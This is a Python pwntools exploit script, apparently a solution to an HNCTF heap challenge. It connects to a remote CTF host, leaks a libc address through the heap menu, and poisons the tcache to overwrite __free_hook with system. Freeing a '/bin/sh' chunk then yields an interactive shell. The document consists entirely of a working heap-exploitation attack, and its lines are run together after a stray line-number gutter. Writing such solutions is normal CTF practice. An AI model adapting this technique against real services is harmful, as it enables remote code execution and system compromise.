1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80
| from pwn import *
import itertools import ctypes
context(os='linux', arch='amd64', log_level='debug')
is_debug = 0 IP = "hnctf.imxbt.cn" PORT = 40950
elf = context.binary = ELF('./what') libc = elf.libc
def connect(): return remote(IP, PORT) if not is_debug else process()
g = lambda x: gdb.attach(x) s = lambda x: p.send(x) sl = lambda x: p.sendline(x) sa = lambda x, y: p.sendafter(x, y) sla = lambda x, y: p.sendlineafter(x, y) r = lambda x=None: p.recv() if x is None else p.recv(x) rl = lambda: p.recvline() ru = lambda x: p.recvuntil(x) r_leak_libc_64 = lambda: u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00')) r_leak_libc_32 = lambda: u32(p.recvuntil(b'\xf7')[-4:])
def add(size): sla("Enter your command:","1") sla("size:",str(size))
def delete(): sla("Enter your command:","2")
def show(idx): sla("Enter your command:","3") sla("please enter idx:",str(idx))
def edit(idx,content): sla("Enter your command:","4") sla("please enter idx:",str(idx)) sa("Please enter your content:",content)
p = connect()
for i in range(9): add(0x80) for i in range(8): delete() show(1)
ru("Content:") leak = u64(r(6).ljust(8,b'\x00')) success(hex(leak)) libc_base = leak - (0x72b6087ebca0 - 0x72b608400000) success(hex(libc_base))
free_hook = libc_base + libc.sym['__free_hook'] system = libc_base + libc.sym['system']
edit(3,p64(free_hook)) add(0x80) add(0x80) add(0x80)
edit(3,p64(system))
edit(2,b'/bin/sh\x00\x00')
delete()
p.interactive()
|